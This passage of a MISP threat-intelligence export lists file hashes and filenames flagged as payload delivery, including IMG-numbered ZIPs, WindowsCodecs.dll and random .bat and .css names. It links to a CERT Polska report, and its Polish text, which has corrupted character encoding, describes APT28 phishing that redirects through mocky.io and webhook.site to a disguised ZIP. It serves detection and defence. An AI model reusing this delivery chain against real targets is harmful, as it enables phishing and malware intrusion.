        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715184501",
        "uuid": "3fef157a-3ec0-488f-b19e-c5c8a976b1f8",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715184501",
            "to_ids": true,
            "type": "sha256",
            "uuid": "0f6e0526-1925-47d0-b467-91a9eb5be141",
            "value": "939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715184501",
            "to_ids": true,
            "type": "filename",
            "uuid": "82fb3f80-980b-4b08-ad73-ed5ed057d93d",
            "value": "ovhupm.css"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715184568",
        "uuid": "5f90086f-8e2b-43c3-879d-002820a9a6ee",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715184568",
            "to_ids": true,
            "type": "sha256",
            "uuid": "c39048dc-f20d-4109-85e3-821416ea7729",
            "value": "949b0bd52a4ed47bc4a342e5a29bff2bcdb0169d2fbf0f052509b65229e19b6e"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715184568",
            "to_ids": true,
            "type": "filename",
            "uuid": "02ff035c-5517-4430-acde-ac8ac7391bf6",
            "value": "IMG-368912.zip"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715184613",
        "uuid": "3283e384-fb80-405a-bac8-93d414a7f13d",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715184613",
            "to_ids": true,
            "type": "sha256",
            "uuid": "49ada1e4-4e8a-450c-bec2-380e2e436866",
            "value": "642315d3091a3dfba6c0ed06f119fc40d21f3d84574b53e045baf8910e1fb38c"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715184613",
            "to_ids": true,
            "type": "filename",
            "uuid": "cf413d16-f036-4ae6-b42d-ef71d6a8d2a7",
            "value": "WindowsCodecs.dll"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715184633",
        "uuid": "ac3a0e68-fa29-443c-81b6-46f75050691d",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715184633",
            "to_ids": true,
            "type": "sha256",
            "uuid": "3ba3f39e-2239-4583-a192-afcb536dd3f1",
            "value": "fb42a4e0f2dd293fd6e7acb8d67d67698a0ae7685bc5462685acf4c2f73d0b44"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715184633",
            "to_ids": true,
            "type": "filename",
            "uuid": "140c69ef-cb66-4ceb-9e15-1e0f9cafbd49",
            "value": "udkozfnsljmbpjs.bat"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715184646",
        "uuid": "9d3bab3c-cc97-483a-8589-197fe2b4748b",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715184646",
            "to_ids": true,
            "type": "sha256",
            "uuid": "48a7c119-bbe1-4d45-8a64-60936e097e46",
            "value": "07e539373177801e3fc5427bf691c0315a23b527d39e756daad6a9fc48e846bc"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715184647",
            "to_ids": true,
            "type": "filename",
            "uuid": "58e0868b-14a8-4ba1-9c1a-215ac75661e5",
            "value": "IMG-368912.jpg"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715184692",
        "uuid": "9207ec19-9539-44c8-979f-bc9823719f8f",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715184692",
            "to_ids": true,
            "type": "sha256",
            "uuid": "879cdcbd-c9a0-457f-b758-b79f92bc53e5",
            "value": "939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715184693",
            "to_ids": true,
            "type": "filename",
            "uuid": "eefbc189-eb9b-4f5f-903b-d5a0cabc840f",
            "value": "wrkybdizscvb.css"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715184790",
        "uuid": "452bf54b-7705-4904-ae1e-de8956d2dcbd",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715184790",
            "to_ids": true,
            "type": "sha256",
            "uuid": "1a88bd12-7e5b-431f-945c-e8d0f8a24e02",
            "value": "5d2675572e092ba9aece8c8d0b9404b3adbd27db1312cd659ba561b86301fe73"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715184790",
            "to_ids": true,
            "type": "filename",
            "uuid": "44dd48c8-615e-4d83-9ade-b7517f5f86cb",
            "value": "IMG-451458326.zip"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715184855",
        "uuid": "f63530e6-b96e-4281-8e2e-a1d7e82f3f52",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715184855",
            "to_ids": true,
            "type": "sha256",
            "uuid": "a12eeb03-76fc-444c-a427-e08b367f33e2",
            "value": "f348a0349fdec136c3ac9eaee9b8761da6bd33df82056e4dd792192731675b00"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715184855",
            "to_ids": true,
            "type": "filename",
            "uuid": "60f41891-bf4a-4cb8-8e10-db82b8cbf63c",
            "value": "WindowsCodecs.dll"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715184872",
        "uuid": "ddb9803a-4f2f-41fd-8600-0fd56884423a",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715184873",
            "to_ids": true,
            "type": "sha256",
            "uuid": "898c1d7b-162f-4505-9387-cdd1b52cd66f",
            "value": "351f10d7df282afed4558d765aa5018af0711fa4f37fa7eb82716313f4848a2f"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715184873",
            "to_ids": true,
            "type": "filename",
            "uuid": "7c2eafe3-7905-46ea-8ecb-19c5a1e22f25",
            "value": "illgvjrfyevoqxk.bat"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715184920",
        "uuid": "292ce6ae-7b5f-4b37-a2ac-e23847020f54",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715184920",
            "to_ids": true,
            "type": "sha256",
            "uuid": "5f13e5f9-5f86-4ef5-b1b5-9b26155bd0e5",
            "value": "85f10d3df079b4db3a83ae3c4620c58a8362df2be449f8ce830d087ab41c7a52"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715184920",
            "to_ids": true,
            "type": "filename",
            "uuid": "b85aa640-43f7-4e69-aad6-04bc5c230236",
            "value": "IMG-451458326.jpg"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715184939",
        "uuid": "ea8a8fa8-bc27-4dd6-8d11-2ed614c079b0",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715184939",
            "to_ids": true,
            "type": "sha256",
            "uuid": "e6ac5754-399a-4e14-b43f-e24a793b4bd5",
            "value": "939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715184939",
            "to_ids": true,
            "type": "filename",
            "uuid": "3ba2f450-8ef9-46f0-8983-973d68bdbc6e",
            "value": "mzmtfylpywlyurkcd.css"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715184977",
        "uuid": "771fc0bc-0722-4fde-8fa4-0119dc11f39d",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715184977",
            "to_ids": true,
            "type": "sha256",
            "uuid": "727b90e5-e2e2-4d38-bf37-e0eddb8e27cc",
            "value": "745cfce3e0242d0d5f6765b1f74608e9086d7793b45dbd1747f2d2778dec6587"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715184977",
            "to_ids": true,
            "type": "filename",
            "uuid": "7756c1bc-bf66-4c8a-b915-c56b2b38ad09",
            "value": "IMG-0601181.zip"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715185012",
        "uuid": "f9ce542f-76a9-4733-96ad-e0337b8084da",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715185012",
            "to_ids": true,
            "type": "sha256",
            "uuid": "a9b815ab-9f27-4032-ba07-85616143e3ca",
            "value": "598a8b918d0d2908a756475aee1e9ffaa57b110d8519014a075668b8b1182990"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715185012",
            "to_ids": true,
            "type": "filename",
            "uuid": "65e07fb9-6dd1-4f67-ba34-93f90a30dcf4",
            "value": "WindowsCodecs.dll"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715185057",
        "uuid": "d4434be0-d0bf-4494-a050-5163e1a00501",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715185058",
            "to_ids": true,
            "type": "sha256",
            "uuid": "9ca56f4c-af24-4b9e-831e-5a8034c389ba",
            "value": "ef67f20ff9184cab46408b27eaf12a5941c9f130be49f1c6ac421b546dac2bac"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715185058",
            "to_ids": true,
            "type": "filename",
            "uuid": "fe877bb9-7f6b-45fe-bf3b-b9056046a1ac",
            "value": "hzjtajjklr.bat"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715185080",
        "uuid": "d469acd5-a763-4815-910f-e281b8703d42",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715185080",
            "to_ids": true,
            "type": "sha256",
            "uuid": "5971460f-8104-4a22-ae16-7c404f78c525",
            "value": "96766dfbf6c661ee3e9f750696803824a04e58402c66f208835a7acebfab1cfc"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715185080",
            "to_ids": true,
            "type": "filename",
            "uuid": "f5b7329e-ce28-4f39-af2b-1189dff6939a",
            "value": "IMG-0601181.jpg"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715185105",
        "uuid": "b6711c34-69d4-45d7-8af0-1fa3a6cd3450",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715185105",
            "to_ids": true,
            "type": "sha256",
            "uuid": "8ddc461c-03b3-4e60-b2c8-92c15fb96963",
            "value": "939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715185105",
            "to_ids": true,
            "type": "filename",
            "uuid": "9778b55c-fbae-4498-9aed-8e93e764edaa",
            "value": "daukbpnawvkfcjcfzu.css"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715185130",
        "uuid": "831cd969-7ac2-4c31-98b2-1df34dc9440c",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715185131",
            "to_ids": true,
            "type": "sha256",
            "uuid": "577f6e0e-e270-4a7d-8ad9-047053dd2209",
            "value": "4f0f9a2076b0fd14124bed08f5fc939bada528e7a8163912a4ad1ec7687029a3"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715185131",
            "to_ids": true,
            "type": "filename",
            "uuid": "a656d934-e95f-46e0-a5a6-bc18558b3e2b",
            "value": "IMG-89848928.zip"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715185158",
        "uuid": "21f77deb-4015-4375-8f95-068e49df10f9",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715185158",
            "to_ids": true,
            "type": "sha256",
            "uuid": "dd2ffa51-7411-4dbe-ae6b-2483a4475f47",
            "value": "ae4e94c5027998f4ce17343e50b935f448e099a89266f9564bd53a069da2ca9a"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715185158",
            "to_ids": true,
            "type": "filename",
            "uuid": "9fb09332-ee63-42f9-b992-07eec707987c",
            "value": "WindowsCodecs.dll"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715185183",
        "uuid": "667464be-8206-4e37-859f-adda50016e83",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715185183",
            "to_ids": true,
            "type": "sha256",
            "uuid": "c6c2c200-5dd0-482c-9f80-438611575a59",
            "value": "d714fff643d53fdd56cf9dcb3bd265e1920c4b5f34a4668b584a0619703d8a3e"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715185183",
            "to_ids": true,
            "type": "filename",
            "uuid": "187ad84e-e837-4965-b065-96f79c79352f",
            "value": "jxfgibtfxiewsdvmeg.bat"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715185200",
        "uuid": "4c6e4ae6-993d-49c0-8ae7-74bbc51f9849",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715185201",
            "to_ids": true,
            "type": "sha256",
            "uuid": "03f1f438-0779-4fb1-bc8b-752b50f3c5c0",
            "value": "b3e60909036c4110eb7e3d8c0b1db5be5c164fcc32056885e4f1afe561341afd"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715185201",
            "to_ids": true,
            "type": "filename",
            "uuid": "c032a0c1-6142-4fd7-9c40-22be4404d931",
            "value": "IMG-89848928.jpg"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715185219",
        "uuid": "a90b87b4-5afa-460c-b3b7-c2ae9d6b3334",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715185219",
            "to_ids": true,
            "type": "sha256",
            "uuid": "9f6e2bd0-f515-4339-8942-9e27e9b2d12c",
            "value": "939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715185219",
            "to_ids": true,
            "type": "filename",
            "uuid": "4683ae77-30d5-4869-8292-1afe20e779e2",
            "value": "cvywrkrhhfzza.css"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715185240",
        "uuid": "cba32fe0-9818-41f5-b607-7eded83314f9",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715185240",
            "to_ids": true,
            "type": "sha256",
            "uuid": "f8453d04-fcf9-49c6-94fa-c428b73ffd37",
            "value": "5883842c87ca6b59236257e15db983cc88d4948cf0d649455f8f393899673fcc"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715185240",
            "to_ids": true,
            "type": "filename",
            "uuid": "12e73dc7-672e-4165-bfe2-c34492959a59",
            "value": "IMG-3907894910429.zip"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715185259",
        "uuid": "b80aa835-216b-4c6a-8837-c3bb28da8718",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715185259",
            "to_ids": true,
            "type": "sha256",
            "uuid": "0f4e90b3-a44c-4a21-ad35-214a5874af3f",
            "value": "0873a19d278a7a8e8cff2dc2e7edbfddc650d8ea961162a6eb3cb3ea14665983"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715185259",
            "to_ids": true,
            "type": "filename",
            "uuid": "d8b61022-6f95-4223-9894-86cfd3700c0f",
            "value": "WindowsCodecs.dll"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715185272",
        "uuid": "a93c737d-21a6-412b-a920-a68b8e57590d",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715185272",
            "to_ids": true,
            "type": "sha256",
            "uuid": "a29aeefc-206d-47b3-941c-62838d42c37c",
            "value": "e826dc4f5c16a1802517881f32f26061a4cbc508c3f7944540a209217078aa11"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715185272",
            "to_ids": true,
            "type": "filename",
            "uuid": "5afc82ee-1b17-421e-b295-601856518e4b",
            "value": "bmpxjphdzwommblflx.bat"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715185288",
        "uuid": "c7737529-d089-43b9-9ef1-f5cfdb11bd64",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715185288",
            "to_ids": true,
            "type": "sha256",
            "uuid": "e1978372-bf4c-4f9c-a50b-4763fc6fd29d",
            "value": "750948489ed5b92750dc254c47b02eb595c6ffcefded6f9d14c3482a96a6e793"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715185288",
            "to_ids": true,
            "type": "filename",
            "uuid": "1259dfcd-f63b-4174-b2e0-6107ae85eb55",
            "value": "IMG-3907894910429.jpg"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "File object describing a file with meta-information",
        "meta-category": "file",
        "name": "file",
        "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
        "template_version": "24",
        "timestamp": "1715185303",
        "uuid": "29f885e5-676a-4eac-b824-694d79adada6",
        "Attribute": [
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "sha256",
            "timestamp": "1715185303",
            "to_ids": true,
            "type": "sha256",
            "uuid": "00958635-58b1-4028-b8fb-8b89600777ae",
            "value": "939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364"
          },
          {
            "category": "Payload delivery",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "filename",
            "timestamp": "1715185303",
            "to_ids": true,
            "type": "filename",
            "uuid": "ad21da8e-e504-4d8b-8977-94be4750f9a6",
            "value": "qseybqanfkus.css"
          }
        ]
      },
      {
        "comment": "",
        "deleted": false,
        "description": "Report object to describe a report along with its metadata.",
        "meta-category": "misc",
        "name": "report",
        "template_uuid": "70a68471-df22-4e3f-aa1a-5a3be19f82df",
        "template_version": "8",
        "timestamp": "1715185434",
        "uuid": "ee17c073-f9a9-4be9-a7fc-ee2571e44da6",
        "Attribute": [
          {
            "category": "External analysis",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "link",
            "timestamp": "1715185434",
            "to_ids": false,
            "type": "link",
            "uuid": "fee1f798-295d-44bd-b84c-49ff4a2f4308",
            "value": "https://cert.pl/posts/2024/05/apt28-kampania/"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": false,
            "object_relation": "title",
            "timestamp": "1715185434",
            "to_ids": false,
            "type": "text",
            "uuid": "710bf56b-3237-4259-9697-e0bc672d4211",
            "value": "Kampania APT28 skierowana przeciwko polskim instytucjom rz\u0105dowym"
          },
          {
            "category": "Other",
            "comment": "",
            "deleted": false,
            "disable_correlation": true,
            "object_relation": "type",
            "timestamp": "1715185434",
            "to_ids": false,
            "type": "text",
            "uuid": "9d6c23db-82c8-423d-887c-59ea34960f4f",
            "value": "Blog"
          }
        ]
      }
    ],
    "EventReport": [
      {
        "name": "Report from - https://cert.pl/posts/2024/05/apt28-kampania/ (1715185341)",
        "content": "# Kampania APT28 skierowana przeciwko polskim instytucjom rz\u00c4 dowym   08 maja 2024 | CERT Polska | #ostrze\u00c5\u00bcenie, #apt, #apt28        Zespo\u00c5\u0082y CERT Polska (CSIRT NASK) oraz CSIRT MON zaobserwowa\u00c5\u0082y w tym tygodniu szeroko zakrojon\u00c4 kampani\u00c4\u0099 szkodliwego oprogramowania wymierzon\u00c4 w polskie instytucje rz\u00c4 dowe. Na podstawie wska\u00c5\u00banik\u00c3\u00b3w technicznych i podobie\u00c5\u0084stwa do atak\u00c3\u00b3w opisywanych w przesz\u00c5\u0082o\u00c5\u009bci (m.in. na podmioty ukrai\u00c5\u0084skie), mo\u00c5\u00bcna powi\u00c4 za\u00c4\u0087 kampani\u00c4\u0099 ze zbiorem aktywno\u00c5\u009bci APT28, kt\u00c3\u00b3ry jest kojarzony z G\u00c5\u0082\u00c3\u00b3wnym Zarz\u00c4 dem Wywiadowczym Sztabu Generalnego Si\u00c5\u0082 Zbrojnych Federacji Rosyjskiej (GRU).\r\n\r\n ## Analiza techniczna\r\n\r\n W kampanii zosta\u00c5\u0082y rozes\u00c5\u0082ane wiadomo\u00c5\u009bci e-mail o tre\u00c5\u009bci, kt\u00c3\u00b3ra ma wywo\u00c5\u0082a\u00c4\u0087 zainteresowanie u odbiorcy i nak\u00c5\u0082oni\u00c4\u0087 go do klikni\u00c4\u0099cia w link. Przyk\u00c5\u0082ad u\u00c5\u00bcytej wiadomo\u00c5\u009bci przedstawiamy poni\u00c5\u00bcej: \r\n\r\n Link kieruje do adresu w domenie run.mocky.io. Jest to darmowy serwis u\u00c5\u00bcywany przez programist\u00c3\u00b3w, do tworzenia i testowania interfejs\u00c3\u00b3w API. W tym przypadku zosta\u00c5\u0082 on wykorzystany jedynie do przekierowania na kolejny serwis \u00e2\u0080\u0093 webhook.site, pozwalaj\u00c4 cy na logowanie wszelkich zapyta\u00c5\u0084 do wygenerowanego adresu oraz konfigurowanie odpowiedzi na nie. Serwis ten r\u00c3\u00b3wnie\u00c5\u00bc jest popularny w\u00c5\u009br\u00c3\u00b3d os\u00c3\u00b3b zwi\u00c4 zanych z IT. Wykorzystanie darmowych, powszechnie u\u00c5\u00bcywanych us\u00c5\u0082ug, zamiast w\u00c5\u0082asnych domen, pozwala na znaczne ograniczenie wykrycia link\u00c3\u00b3w jako z\u00c5\u0082o\u00c5\u009bliwe, a jednocze\u00c5\u009bnie obni\u00c5\u00bca koszt prowadzonej operacji. Jest to trend, kt\u00c3\u00b3ry obserwujemy u wielu grup APT.\r\n\r\n Z serwisu webhook.site zostaje ostatecznie pobrane archiwum ZIP, kt\u00c3\u00b3rego nazwa sugeruje zawarto\u00c5\u009b\u00c4\u0087 w postaci zdj\u00c4\u0099\u00c4\u0087. Zaczyna si\u00c4\u0099 ona od IMG-, a ko\u00c5\u0084czy losow\u00c4 liczb\u00c4 - np. IMG-238279780.zip. Po klikni\u00c4\u0099ciu w archiwum, przy domy\u00c5\u009blnych ustawieniach systemu Windows (ukryte rozszerzenia i brak pokazywania ukrytych 